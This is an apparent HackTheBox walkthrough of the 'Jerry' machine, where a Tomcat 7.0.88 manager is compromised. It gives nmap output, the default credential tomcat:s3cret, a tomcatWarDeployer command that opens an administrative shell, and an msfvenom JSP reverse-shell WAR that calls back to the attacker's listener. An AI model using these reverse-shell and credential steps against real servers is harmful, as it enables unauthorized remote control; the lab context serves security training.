Today we are going to solve another HackTheBox machine “jerry” created by mrh4sh . Lab is mainly focus on exploitation of tomcat server .
Level : Easy
- Network scanning
- Tomcat enumeration
- tomcat 7.0.88 exploit
- Virtual Environment setup
- Privilege Escalation
- Manual Exploitation
IP address : 10.129.1.110
We start our journey by running the Nmap scan against the machine to enumerate the open port and services on machine .
nmap -sC -sV -p- 10.129.1.110 -Pn Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 23:51 IST Nmap scan report for 10.129.1.110 Host is up (0.16s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88
Nmap show the port 8080 port is open on which Apache Tomcat is running and the title also give the information about the version which is 7.0.88 which is exploitable. After doing some google we land to the exploit which you can get from GitHub. .
After reading the exploit and understand the flow of exploit we setup the virtual environment so that we can install pre dependencies to run our exploit.
git clone https://github.com/mgeeky/tomcatWarDeployer.git virtualenv -p python2 venv source venv/bin/activate pip install -r requirements.txt
Once everything is set , we also need the credentials for tomcat server so after google we land on the GitHub page which provides some default credentials after trying some credentials we got it “admin:s3cret”. After successful exploit we got the administrative shell and we collect the flags .
python tomcatWarDeployer.py -U tomcat -P s3cret -H 10.10.14.79 -p 1234 10.129.1.110:8080 -x type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
You can also exploit without the need of tomcatwardeployer script for this we need to create the Metasploit payload and upload on the tomcat server.
Once login to the account , simply go to war file upload section and upload the payload file and deploy it .
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.79 LPORT=5454 -f war > shell.war
Once the payload successfully uploaded we call the payload using the curl and we got the session .